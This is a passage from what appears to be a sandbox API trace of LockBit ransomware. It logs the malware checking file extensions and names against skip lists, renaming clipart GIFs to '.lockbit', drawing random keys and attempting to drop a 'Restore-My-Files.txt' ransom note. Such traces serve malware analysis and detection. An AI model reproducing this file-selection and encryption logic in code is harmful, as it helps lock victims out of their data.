(lpString1="ntuser.dat.log", lpString2="J0099197.GIF") returned 1 [0124.375] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099197.GIF") returned -1 [0124.375] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099197.GIF") returned -1 [0124.375] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099197.GIF") returned 1 [0124.375] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099197.GIF") returned -1 [0124.375] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.375] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned=".GIF" [0124.375] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.375] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.376] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.376] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.376] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF.lockbit") returned 72 [0124.376] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.377] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.378] malloc (_Size=0x40068) returned 0x3df0008 [0124.378] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10898) returned 1 [0124.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.379] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.429] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.429] malloc (_Size=0xa6) returned 0x77d7a8 [0124.430] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0124.430] free (_Block=0x77d7a8) [0124.430] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.430] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.431] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099198.GIF", cAlternateFileName="")) returned 1 [0124.431] lstrcmpiW (lpString1=".", lpString2="J0099198.GIF") returned -1 [0124.431] lstrcmpiW (lpString1="..", lpString2="J0099198.GIF") returned -1 [0124.431] PathFindExtensionW (pszPath="J0099198.GIF") returned=".GIF" [0124.431] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.431] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.431] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.431] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.431] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.431] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.431] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.431] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.431] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.431] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.431] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.431] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.431] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.431] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.431] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.431] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.432] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.432] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.432] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.432] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.432] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.432] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.432] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099198.GIF") returned 1 [0124.433] lstrcmpiW (lpString1="ntldr", lpString2="J0099198.GIF") returned 1 [0124.433] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099198.GIF") returned 1 [0124.433] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099198.GIF") returned -1 [0124.433] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099198.GIF") returned -1 [0124.433] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099198.GIF") returned 1 [0124.433] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099198.GIF") returned -1 [0124.433] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.433] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned=".GIF" [0124.433] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.433] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.433] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.433] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.433] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.433] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.433] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.434] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.434] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.434] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.434] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.434] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.434] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.434] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.434] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.434] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.434] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF.lockbit") returned 72 [0124.434] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.435] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.435] malloc (_Size=0x40068) returned 0x3df0008 [0124.435] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5259) returned 1 [0124.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.437] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.452] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.452] malloc (_Size=0xa6) returned 0x77d7a8 [0124.454] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0124.454] free (_Block=0x77d7a8) [0124.454] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.454] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.454] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.454] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x84b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099199.GIF", cAlternateFileName="")) returned 1 [0124.454] lstrcmpiW (lpString1=".", lpString2="J0099199.GIF") returned -1 [0124.454] lstrcmpiW (lpString1="..", lpString2="J0099199.GIF") returned -1 [0124.454] PathFindExtensionW (pszPath="J0099199.GIF") returned=".GIF" [0124.454] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.454] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.454] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.454] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.454] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.454] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.454] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.454] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.454] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.455] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.455] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.455] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.455] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.455] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.455] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.455] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.455] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.455] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.456] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099199.GIF") returned 1 [0124.456] lstrcmpiW (lpString1="ntldr", lpString2="J0099199.GIF") returned 1 [0124.456] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099199.GIF") returned 1 [0124.456] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099199.GIF") returned -1 [0124.456] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099199.GIF") returned -1 [0124.456] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099199.GIF") returned 1 [0124.456] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099199.GIF") returned -1 [0124.456] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.456] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned=".GIF" [0124.456] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.456] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.456] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.456] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.456] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.457] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.457] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.457] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF.lockbit") returned 72 [0124.457] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.458] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.458] malloc (_Size=0x40068) returned 0x3df0008 [0124.458] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33975) returned 1 [0124.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.459] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.460] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.468] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.468] malloc (_Size=0xa6) returned 0x77d7a8 [0124.468] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.575] free (_Block=0x77d7a8) [0124.575] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.575] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.575] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.575] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x409f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099200.GIF", 